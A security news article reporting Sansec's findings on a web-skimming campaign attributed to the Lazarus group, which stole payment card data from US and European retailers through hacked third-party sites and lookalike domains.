Lazarus grouping is suspected of stealing payment card data of customers in the USA and Europe


Sansec specialists reported a large-scale malicious campaign to steal payment card data from customers of large retailers in the US and Europe. In fraudulent activities that researchers suspected the Lazarus group (also known as Hidden Cobra), criminals used legitimate websites to steal credit card information and disguise their transactions.

According to experts, web-skimmers were downloaded from domains that were used by criminals during successful phishing attacks. The list of victims of attackers includes dozens of stores, including large companies such as Claire’s, Wongs Jewelers, Focus Camera, Paper Source, Jit Truck Parts, CBD Armor, Microbattery and Realchems.

In order to hide their tracks, criminals break into the sites of legitimate enterprises to upload stolen information to them. Attackers hacked into the sites of the Italian modeling agency Lux Model Agency, a bookstore in New Jersey and an old music store in Tehran.

Another Lazarus tactic was registering domain names similar to the names of real stores.

In June 2019, Sansec specialists discovered a skimmer on the website of an American truck parts store that used the hacked website of an Italian model agency to collect payment data. The implemented customize-gtag.min.js script was encrypted using an obfuscator written in Javascript. The code hidden the line WTJ4cFpXNTBWRzlyWlc0OQ ==, which is used as the HTTP GET parameter to send the stolen payload to the hacked site.

The malware was removed within 24 hours after the download, but a week later the malware appeared again on the website page of the same store. This time, it used a bookstore in New Jersey to steal credit card information.

In February and March 2020, several domain names similar to the popular consumer brands (PAPERS0URCE.COM, FOCUSCAMERE.COM and CLAIRES-ASSETS.COM) were registered. Subsequently, experts found that the online stores of the three respective brands were compromised and infected with malware to collect payment information.

In all three cases, the same infrastructure was used, as well as a certain piece of code that experts had never seen before.

Researchers acknowledge that these attacks may be the work of other criminals, but the likelihood of simultaneous control of the same hacked websites is unlikely. One reason is that attackers usually use the victim for personal purposes and prevent other criminals from accessing exploited vulnerabilities.


All News

Scroll top